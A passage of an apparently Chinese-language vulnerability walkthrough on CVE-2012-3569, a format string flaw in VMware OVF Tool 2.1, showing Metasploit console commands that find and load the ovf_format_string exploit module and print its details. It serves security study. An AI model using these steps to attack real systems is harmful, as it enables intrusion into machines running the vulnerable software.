注意到 Vulnerability Point 处的代码在调用 std::basic_ostream 的 operator 成员函数以进行格式化输出时没有对来自于外界输入的格式化字符参数进行检查和过滤,因而存在格式化字符串漏洞
漏洞利用
使用 MSF 搜索该漏洞的 exp
1 2
msfconsole msf6 > search cve-2012-3569
搜索结果
1 2 3 4 5 6 7 8 9 10
Matching Modules ================
# Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/windows/browser/ovftool_format_string 2012-11-08 normal No VMWare OVF Tools Format String Vulnerability 1 exploit/windows/fileformat/ovf_format_string 2012-11-08 normal No VMWare OVF Tools Format String Vulnerability
Interact with a module by name or index. For example info 1, use 1 or use exploit/windows/fileformat/ovf_format_string
调用该模块并查看模块详情
1 2
msf6 > use exploit/windows/fileformat/ovf_format_string msf6 exploit(windows/fileformat/ovf_format_string) > info
msf6 exploit(windows/fileformat/ovf_format_string) > info
Name: VMWare OVF Tools Format String Vulnerability Module: exploit/windows/fileformat/ovf_format_string Platform: Windows Arch: Privileged: No License: Metasploit Framework License (BSD) Rank: Normal Disclosed: 2012-11-08
Provided by: Jeremy Brown juan vazquez <juan.vazquez@metasploit.com>
Available targets: Id Name -- ---- => 0 VMWare OVF Tools 2.1 on Windows XP SP3
Check supported: No
Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- FILENAME msf.ovf yes The file name.
Payload information: Avoid: 158 characters
Description: This module exploits a format string vulnerability in VMWare OVF Tools 2.1 for Windows. The vulnerability occurs when printing error messages while parsing a a malformed OVF file. The module has been tested successfully with VMWare OVF Tools 2.1 on Windows XP SP3.